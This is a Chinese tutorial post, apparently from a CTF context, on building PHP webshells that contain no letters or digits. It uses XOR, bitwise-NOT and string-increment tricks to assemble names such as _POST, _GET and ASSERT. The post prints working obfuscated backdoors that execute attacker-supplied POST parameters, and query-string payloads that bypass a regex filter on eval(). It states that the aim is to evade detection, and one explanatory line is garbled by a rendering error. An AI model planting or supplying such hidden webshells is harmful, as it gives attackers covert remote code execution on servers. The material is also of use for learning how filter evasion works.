当前位置：首页 > news >正文

过滤字符，绕过

news 2026/2/2 6:49:21

构造不包含字母和数字的webshell

<?phpecho "A"^"`";
?>

运行结果为!

代码中对字符"A"和字符”`"进行了异或操作。在PHP中，两个变量进行异或时，先会将字符串转换成ASCII值，再将ASCII值转换成二进制再进行异或，异或完，又将结果从二进制转换成了ASCII值，再将ASCII值转换成字符串。异或操作有时也被用来交换两个变量的值。
在php中，异或操作是两个二进制数相同时，异或为0，不同为1。
PHP是弱类型的语言，也就是说在PHP中我们可以不预先声明变量的类型，而直接声明一个变量并进行初始化或赋值操作。如将整型转换成字符串型，将布尔型当作整型，或者将字符串当作函数来处理。

<?phpfunction B(){echo "Hello Angel_Kitty";}$_++;$__= "?" ^ "}";$__();
?>

执行结果为：Hello Angel_Kitty

$++;这行代码的意思是对变量名为""的变量进行自增操作，在PHP中未定义的变量默认值为null,null ==false= =0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。

我们希望使用这种后门创建一些可以绕过检测的并且对我们有用的字符串，如_POST", “system”, “call_user_func_array”，或者是任何我们需要的东西。

PHP后门

<?php@$_++; // $_ = 1$__=("#"^"|"); // $__ = _$__.=("."^"~"); // _P$__.=("/"^"`"); // _PO$__.=("|"^"/"); // _POS$__.=("{"^"/"); // _POST ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

异或进行绕过

<?php
include 'flag.php';
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>40){die("Long.");}if(preg_match("/[A-Za-z0-9]+/",$code)){die("NO.");}@eval($code);
}else{highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

payload

?code=$_="`{{{"^"?<>/";${$_}[_]();&_=getFlag
$_GET[_]();&
<?phpecho "`{{{"^"?<>/";//_GET
?>

“`{{{”^"?<>/"的结果是"GET"，所以 $KaTeX parse error: Expected '}', got 'EOF' at end of input: {$ }_=$GET_，而此时=getFlag
取反进行绕过

<?php
$a = "getFlag";
echo urlencode(~$a);
?>

payload：

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();

利用php语法绕过
利用php语法规则，在处理字符变量的算数运算时，PHP 沿袭了 Perl 的习惯，而非 C 的。例如，在 Perl 中 $a = ‘Z’; $a++; 将把 $a 变成’AA’，而在 C 中，a = ‘Z’; a++; 将把 a 变成 ‘[’（‘Z’ 的 ASCII 值是 90，‘[’ 的 ASCII 值是 91）。注意字符变量只能递增，不能递减，并且只支持纯字母（a-z 和 A-Z）。递增／递减其他字符变量则无效，原字符串没有变化。‘a’++ => ‘b’，‘b’++ => ‘c’… 所以，我们只要能拿到一个变量，其值为a，通过自增操作即可获得a-z中所有字符。如何拿到一个值为字符串’a’的变量，数组（Array）的第一个字母就是大写A，而且第4个字母是小写a。也就是说，我们可以同时拿到小写和大写A，等于我们就可以拿到a-z和A-Z的所有字母。在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为Array，再取这个字符串的第一个字母，就可以获得’A’了。

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
ASSERT
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

payload：

?code=$啊="@@^|@@@"^"'%*:,!'";$啊();

过滤字符，绕过

相关文章：

过滤字符，绕过

Apache Doris 入门教程32：物化视图

PHP substr()函数详解，PHP截取字符串。

关于flink-sql-connector-phoenix的重写逻辑

Django进阶：DRF(Django REST framework)

Flink CDC系列之：Oracle CDC 导入 Elasticsearch

Linux忘记root密码解决方法

AR/VR眼镜转接器方案，实现同时传输视频快充方案

ASP.NET Core中路由规则匹配

IDEA：Error running，Command line is too long. 解决方法

什么是反射机制？为什么反射慢？

list元素

OkHttp 源码浅析一

【解决问题】远程仓库GitHub/GitLab添加了SSH Key之后依然无法clone的解决办法

回归预测 | MATLAB实现SA-SVM模拟退火算法优化支持向量机多输入单输出回归预测（多指标，多图）

Spring事务和事务传播机制（1）

如何快速在vscode中实现不同python文件的对比查看

网络安全---Ring3下动态链接库.so函数劫持

leetcode283. 移动零

GuLi商城-前端基础Vue-生命周期和钩子函数

谷歌浏览器插件

日语学习-日语知识点小记-构建基础-JLPT-N4阶段（33）：にする

微信小程序 - 手机震动

《通信之道——从微积分到 5G》读书总结

页面渲染流程与性能优化

鸿蒙中用HarmonyOS SDK应用服务 HarmonyOS5开发一个医院查看报告小程序

反射获取方法和属性

C++.OpenGL （10/64）基础光照（Basic Lighting）

Spring AI 入门：Java 开发者的生成式 AI 实践之路

【C++从零实现Json-Rpc框架】第六弹 —— 服务端模块划分